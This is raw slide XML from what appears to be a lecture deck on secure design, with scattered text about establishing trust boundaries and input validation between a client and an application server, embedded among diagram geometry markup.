              <a:rPr sz="1999" spc="-4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define</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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it</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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15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999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be</a:t>
            </a:r>
            <a:endParaRPr sz="1999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9546" y="3162916"/>
            <a:ext cx="4572079" cy="940190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="298995" marR="5078" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="55" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust 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Boundaries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where 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necessary </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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15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999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help</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>make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 decisions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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about</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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security 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issues</a:t>
            </a:r>
            <a:endParaRPr sz="1999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72270" y="6328518"/>
            <a:ext cx="4941553" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://support.perkins.org/images/content/pagebuilder/humptydumpty.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="100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4701399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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25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267122"/>
            <a:ext cx="9878027" cy="887499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Boundaries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are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logical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constructs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example,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Boundary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input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handling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might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look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like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20786" y="2118447"/>
            <a:ext cx="3645220" cy="1960369"/>
            <a:chOff x="7322693" y="2118105"/>
            <a:chExt cx="3646170" cy="1960880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7337298" y="3099053"/>
              <a:ext cx="922655" cy="6350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="922654" h="6350">
                  <a:moveTo>
                    <a:pt x="922147" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5969"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2895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9662160" y="2124455"/>
              <a:ext cx="1300480" cy="1948180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1300479" h="1948179">
                  <a:moveTo>
                    <a:pt x="0" y="216662"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5723" y="166991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22026" y="121390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47606" y="81161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81161" y="47606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121390" y="22026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166991" y="5723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216661" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083310" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1132980" y="5723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178581" y="22026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1218810" y="47606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252365" y="81161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277945" y="121390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294248" y="166991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299972" y="216662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299972" y="1731010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294248" y="1780680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277945" y="1826281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252365" y="1866510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1218810" y="1900065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178581" y="1925645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1132980" y="1941948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083310" y="1947672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216661" y="1947672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166991" y="1941948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121390" y="1925645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81161" y="1900065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47606" y="1866510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22026" y="1826281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5723" y="1780680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1731010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216662"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12191">
              <a:solidFill>
                <a:srgbClr val="006FC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9719310" y="2719577"/>
              <a:ext cx="1149350" cy="746760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1149350" h="746760">
                  <a:moveTo>
                    <a:pt x="0" y="124460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9784" y="76027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36464" y="36464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76027" y="9784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124460" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024636" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073068" y="9784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112631" y="36464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1139311" y="76027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149096" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149096" y="622300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1139311" y="670732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112631" y="710295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073068" y="736975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024636" y="746760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124460" y="746760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76027" y="736975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36464" y="710295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9784" y="670732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="622300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:close/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905071" y="2865012"/>
            <a:ext cx="771324" cy="396801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61876" marR="5078" indent="-149815" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107500"/>
              </a:lnSpc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ppl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10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cati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n  Server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822567" y="2324261"/>
            <a:ext cx="4267993" cy="1550266"/>
            <a:chOff x="6824344" y="2323973"/>
            <a:chExt cx="4269105" cy="1550670"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7764017" y="2338578"/>
              <a:ext cx="3314700" cy="1521460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3314700" h="1521460">
                  <a:moveTo>
                    <a:pt x="0" y="253491"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4085" y="207938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15864" y="165058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34619" y="125570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59633" y="90189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90189" y="59633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125570" y="34619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165058" y="15864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207938" y="4085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253492" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061208" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3106761" y="4085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149641" y="15864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3189129" y="34619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3224510" y="59633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3255066" y="90189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3280080" y="125570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3298835" y="165058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3310614" y="207938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3314700" y="253491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3314700" y="1267459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3310614" y="1313013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3298835" y="1355893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3280080" y="1395381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3255066" y="1430762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3224510" y="1461318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3189129" y="1486332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149641" y="1505087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3106761" y="1516866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061208" y="1520951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253492" y="1520951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207938" y="1516866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165058" y="1505087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125570" y="1486332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90189" y="1461318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59633" y="1430762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34619" y="1395381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15864" y="1355893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4085" y="1313013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1267459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="253491"/>
                  </a:lnTo>
                  <a:close/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838949" y="2567178"/>
              <a:ext cx="492759" cy="1065530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="1065529">
                  <a:moveTo>
                    <a:pt x="82042" y="1065276"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="50095" y="1058832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24018" y="1041257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6443" y="1015180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="983234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="82042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6443" y="50095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24018" y="24018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50095" y="6443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82042" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410210" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442156" y="6443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468233" y="24018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485808" y="50095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="82042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="983234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485808" y="1015180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468233" y="1041257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442156" y="1058832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410210" y="1065276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82042" y="1065276"/>
                  </a:lnTo>
                  <a:close/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981615" y="2824687"/>
            <a:ext cx="179536" cy="54849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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pP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re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all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525465" y="2552801"/>
            <a:ext cx="3209089" cy="3259241"/>
            <a:chOff x="6527165" y="2552573"/>
            <a:chExt cx="3209925" cy="3260090"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9420606" y="3099054"/>
              <a:ext cx="301625" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="301625">
                  <a:moveTo>
                    <a:pt x="301498" y="0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271510" y="2713482"/>
              <a:ext cx="1149350" cy="746760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1149350" h="746760">
                  <a:moveTo>
                    <a:pt x="0" y="124460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9784" y="76027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36464" y="36464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76027" y="9784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124460" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024636" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073068" y="9784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112631" y="36464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1139311" y="76027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149096" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149096" y="622300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1139311" y="670732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112631" y="710295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073068" y="736975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024636" y="746760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124460" y="746760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76027" y="736975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36464" y="710295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9784" y="670732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="622300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:close/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6541770" y="2567178"/>
              <a:ext cx="87630" cy="3230880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="87629" h="3230879">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87503" y="3230841"/>
                  </a:lnTo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502086" y="2858536"/>
            <a:ext cx="684352" cy="396801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marR="5078" indent="158068" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107700"/>
              </a:lnSpc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Input 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200" spc="-85" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>V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al</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10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da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ti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76116" y="5133150"/>
            <a:ext cx="1386479" cy="972566"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1386840" h="972820">
                <a:moveTo>
                  <a:pt x="0" y="486155"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2299" y="446286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9077" y="407303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20156" y="369333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35356" y="332500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54500" y="296929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77409" y="262747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103904" y="230077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133807" y="199046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166938" y="169778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203120" y="142398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242174" y="117032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283921" y="93805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328182" y="72841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374780" y="54267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423535" y="38207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474268" y="24786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526802" y="14130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580958" y="6363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636556" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693420" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="750283" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805881" y="6363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="860037" y="14130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912571" y="24786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963304" y="38207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012059" y="54267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058657" y="72841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102918" y="93805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1144665" y="117032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183719" y="142398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1219901" y="169778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1253032" y="199046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282935" y="230077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309430" y="262747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332339" y="296929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351483" y="332500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1366683" y="369333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377762" y="407303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1384540" y="446286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386840" y="486155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1384540" y="526027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377762" y="565011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1366683" y="602983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351483" y="639816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332339" y="675387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309430" y="709570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282935" y="742239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1253032" y="773270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1219901" y="802538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183719" y="829918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1144665" y="855283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102918" y="878510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1058657" y="899473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012059" y="918047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963304" y="934106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912571" y="947526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="860037" y="958182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805881" y="965948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="750283" y="970700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693420" y="972311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636556" y="970700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580958" y="965948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526802" y="958182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474268" y="947526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423535" y="934106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374780" y="918047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328182" y="899473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283921" y="878510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242174" y="855283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203120" y="829918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166938" y="802538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133807" y="773270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103904" y="742239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77409" y="709570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54500" y="675387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35356" y="639816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20156" y="602983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9077" y="565011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2299" y="526027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="486155"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="2895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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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48686" y="5488098"/>
            <a:ext cx="441844" cy="228209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1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>lie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr sz="1400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587298" y="2399678"/>
            <a:ext cx="3287809" cy="3254162"/>
            <a:chOff x="6589014" y="2399410"/>
            <a:chExt cx="3288665" cy="3255010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6630162" y="5633465"/>
              <a:ext cx="922655" cy="6350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="922654" h="6350">
                  <a:moveTo>
                    <a:pt x="922147" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="6019"/>
                  </a:lnTo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589014" y="3099053"/>
              <a:ext cx="251460" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="251459">
                  <a:moveTo>
                    <a:pt x="250951" y="0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7551341" y="2538094"/>
              <a:ext cx="344805" cy="1781810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="344804" h="1781810">
                  <a:moveTo>
                    <a:pt x="30177" y="1781809"/>
                  </a:moveTo>
                  <a:lnTo>
